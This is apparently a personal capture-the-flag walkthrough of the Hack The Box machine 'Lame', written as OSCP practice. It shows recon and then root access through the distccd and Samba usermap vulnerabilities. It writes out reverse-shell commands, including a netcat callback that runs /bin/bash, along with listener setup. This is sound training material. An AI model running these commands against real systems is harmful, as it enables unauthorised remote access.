Hack The Box — Lame Walkthrough

Like a lot of people I am starting off my OSCP prep by running through TJnull’s OSCP HTB/Vulnhub VM list and doing each box without Metasploit, starting with Lame.

I have decided to do writeups on each of the retired machines I complete to help reinforce the techniques and processes each box helps develop.

Lame is first in the list and was a pretty easy box to root overall , there are a couple of different ways to root this host this is just how I obtained root — lets begin.

Recon

For doing initial recon I use AutoRecon by Tib3rius it saves a lot of time and outputs scan results nice and neat.

Command: python autorecon.py 10.10.10.3

Checking the quick scan output, we have a couple of ports open:

FTP — The version of VSFTP running on the host appears to be vulnerable to CVE-2011–2523, however the exploit fails/doesn't complete or bind on port 6200, anonymous login is enabled for this FTP but there is no read/write access once authenticated.

SSH — There were no direct SSH vulns I could find that were applicable, I wanted to avoid brute forcing the login.

SMB — A quick google for SMB 3.0.20 exploits reveals it may be vulnerable to CVE-2007–2447, lets make a mental note of this for now.

distccd— DistCC is a compiler, it runs a daemon process on 3632, a quick look at our autorecon output reveals it is vulnerable to RCE, we start here (yes I did not check the SMB scan output yet :) ).

Exploitation

Taking a look into distcc, a quick Google brings me to a gist with code related to CVE-2004–2687

This simple script lets us pass the target ip and port (3632) as arguments along with a command to execute on the target.

Set up our netcat listener:

Command: nc -nlvp 4441

Execute the CVE-2004–2687 script passing commands for the target to connect back to our attacker box:

Command: python ditccd_rce_CVE-2004–2687.py -t 10.10.10.3 -p 3632 -c “nc 10.10.14.9 4441 -e /bin/bash”

Check our netcat listener and we have a shell as daemon:

After some quick poking around we find the user flag in the makis home directory:

At this point I was taking a look for various privilege escalation options but decided to go back and take a look at the autorecon SMB output/related vulns.

Going back to our user level daemon session, we can see that the smbd service / process is running as root:

After some quick research on CVE-2007–2447, we locate a simple script that will let us pass target ip/port and command args to execute.

We set up our second netact listener:

Command: nc -nlvp 4442

And execute the RCE script:

Command: python3 usermap_script.py 10.10.10.3 445 10.10.14.9 4442

Checking our listener on 4442 we should now have access

We can quickly spawn an interactive python shell and view our root flag:

Done!

Conclusion

Super straight forward box, this box made realise I need to include a better “planning” phase in my methodology, i.e once the recon scripts are finished don't just dive right in, take stock of what you have and then map out your paths, I actively do this somethings but it needs to become second nature.

If you are here, thanks for reading :)